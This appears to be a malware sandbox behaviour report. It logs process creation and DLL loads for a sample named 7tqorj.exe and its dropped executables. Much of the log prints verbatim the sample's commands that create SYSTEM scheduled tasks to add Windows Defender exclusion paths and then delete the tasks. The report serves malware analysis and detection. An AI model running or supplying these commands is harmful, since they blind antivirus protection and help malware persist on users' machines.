Source: C:\Users\user\Documents\7tqorj.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1"
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f
Source: C:\Users\user\Documents\7tqorj.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1"
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f
Source: C:\Users\user\Documents\7tqorj.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"%USERPROFILE%\Documents\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\user\Documents\" /t REG_DWORD /d 0 /f"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1"
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /f
Source: C:\Users\user\Documents\7tqorj.exe	Process created: C:\Program Files (x86)\qNHTRl\qNHTRl.exe "C:\Program Files (x86)\qNHTRl\qNHTRl.exe"
Source: unknown	Process created: C:\Program Files (x86)\qNHTRl\qNHTRl.exe "C:\Program Files (x86)\qNHTRl\qNHTRl.exe"
Source: unknown	Process created: C:\Program Files (x86)\2U36F\NroRNr.exe "C:\Program Files (x86)\2U36F\NroRNr.exe"
Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c echo.>c:\xxxx.ini
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Program Files (x86)\2U36F\NroRNr.exe "C:\Program Files (x86)\2U36F\NroRNr.exe"
Source: unknown	Process created: C:\Program Files (x86)\qNHTRl\qNHTRl.exe "C:\Program Files (x86)\qNHTRl\qNHTRl.exe"
Source: C:\Users\user\Documents\7tqorj.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F	Jump to behavior
Source: C:\Users\user\Documents\7tqorj.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F	Jump to behavior
Source: C:\Users\user\Documents\7tqorj.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F	Jump to behavior
Source: C:\Users\user\Documents\7tqorj.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"%USERPROFILE%\Documents\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F	Jump to behavior
Source: C:\Users\user\Documents\7tqorj.exe	Process created: C:\Program Files (x86)\qNHTRl\qNHTRl.exe "C:\Program Files (x86)\qNHTRl\qNHTRl.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /F	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /F	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /F	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\user\Documents\" /t REG_DWORD /d 0 /f"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /F	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /f	Jump to behavior
Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c echo.>c:\xxxx.ini	Jump to behavior

Source: C:\Users\user\Desktop\2749837485743-7684385786.05.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\2749837485743-7684385786.05.exe	Section loaded: pid.dll	Jump to behavior
Source: C:\Users\user\Desktop\2749837485743-7684385786.05.exe	Section loaded: hid.dll	Jump to behavior
Source: C:\Users\user\Desktop\2749837485743-7684385786.05.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\2749837485743-7684385786.05.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\2749837485743-7684385786.05.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\2749837485743-7684385786.05.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\2749837485743-7684385786.05.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\2749837485743-7684385786.05.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\2749837485743-7684385786.05.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\2749837485743-7684385786.05.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\2749837485743-7684385786.05.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\2749837485743-7684385786.05.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\2749837485743-7684385786.05.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\2749837485743-7684385786.05.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\2749837485743-7684385786.05.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\2749837485743-7684385786.05.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\2749837485743-7684385786.05.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\2749837485743-7684385786.05.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\2749837485743-7684385786.05.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\2749837485743-7684385786.05.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\2749837485743-7684385786.05.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\2749837485743-7684385786.05.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\2749837485743-7684385786.05.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\2749837485743-7684385786.05.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\2749837485743-7684385786.05.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\2749837485743-7684385786.05.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\2749837485743-7684385786.05.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\2749837485743-7684385786.05.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\2749837485743-7684385786.05.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\2749837485743-7684385786.05.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\2749837485743-7684385786.05.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\2749837485743-7684385786.05.exe	Section loaded: msv1_0.dll	Jump to behavior
Source: C:\Users\user\Desktop\2749837485743-7684385786.05.exe	Section loaded: ntlmshared.dll	Jump to behavior
Source: C:\Users\user\Desktop\2749837485743-7684385786.05.exe	Section loaded: cryptdll.dll	Jump to behavior
Source: C:\Users\user\Documents\7tqorj.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Documents\7tqorj.exe	Section loaded: vselog.dll	Jump to behavior
Source: C:\Users\user\Documents\7tqorj.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Documents\7tqorj.exe	Section loaded: vselog.dll	Jump to behavior
Source: C:\Users\user\Documents\7tqorj.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Documents\7tqorj.exe	Section loaded: vselog.dll	Jump to behavior
Source: C:\Users\user\Documents\7tqorj.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Documents\7tqorj.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Documents\7tqorj.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Documents\7tqorj.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Documents\7tqorj.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Documents\7tqorj.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Documents\7tqorj.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Documents\7tqorj.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Documents\7tqorj.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Documents\7tqorj.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Documents\7tqorj.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Documents\7tqorj.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Documents\7tqorj.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Documents\7tqorj.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Documents\7tqorj.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Documents\7tqorj.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Documents\7tqorj.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Documents\7tqorj.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Documents\7tqorj.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Documents\7tqorj.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Documents\7tqorj.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Documents\7tqorj.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Documents\7tqorj.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Documents\7tqorj.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Documents\7tqorj.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Documents\7tqorj.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Documents\7tqorj.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Documents\7tqorj.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Documents\7tqorj.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Documents\7tqorj.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Documents\7tqorj.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Documents\7tqorj.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Documents\7tqorj.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Documents\7tqorj.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Documents\7tqorj.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Documents\7tqorj.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Documents\7tqorj.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Documents\7tqorj.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Documents\7tqorj.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Documents\7tqorj.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Documents\7tqorj.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Documents\7tqorj.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Documents\7tqorj.exe	Section loaded: twext.dll	Jump to behavior
Source: C:\Users\user\Documents\7tqorj.exe	Section loaded: cscui.dll	Jump to behavior
Source: C:\Users\user\Documents\7tqorj.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Users\user\Documents\7tqorj.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Users\user\Documents\7tqorj.exe	Section loaded: workfoldersshell.dll	Jump to behavior
Source: C:\Users\user\Documents\7tqorj.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Users\user\Documents\7tqorj.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\Documents\7tqorj.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Users\user\Documents\7tqorj.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Users\user\Documents\7tqorj.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Documents\7tqorj.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Documents\7tqorj.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\Documents\7tqorj.exe	Section loaded: starttiledata.dll	Jump to behavior
Source: C:\Users\user\Documents\7tqorj.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Documents\7tqorj.exe	Section loaded: usermgrcli.dll	Jump to behavior
Source: C:\Users\user\Documents\7tqorj.exe	Section loaded: usermgrproxy.dll	Jump to behavior
Source: C:\Users\user\Documents\7tqorj.exe	Section loaded: acppage.dll	Jump to behavior
Source: C:\Users\user\Documents\7tqorj.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Users\user\Documents\7tqorj.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Users\user\Documents\7tqorj.exe	Section loaded: aepic.dll	Jump to behavior
Source: C:\Users\user\Documents\7tqorj.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Documents\7tqorj.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\Documents\7tqorj.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\Documents\7tqorj.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exe	Section loaded: tbcore3u.dll	Jump to behavior
Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exe	Section loaded: msv1_0.dll	Jump to behavior
Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exe	Section loaded: ntlmshared.dll	Jump to behavior
Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exe	Section loaded: cryptdll.dll	Jump to behavior
Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exe	Section loaded: devenum.dll	Jump to behavior
Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exe	Section loaded: msasn1.dll	Jump to behavior
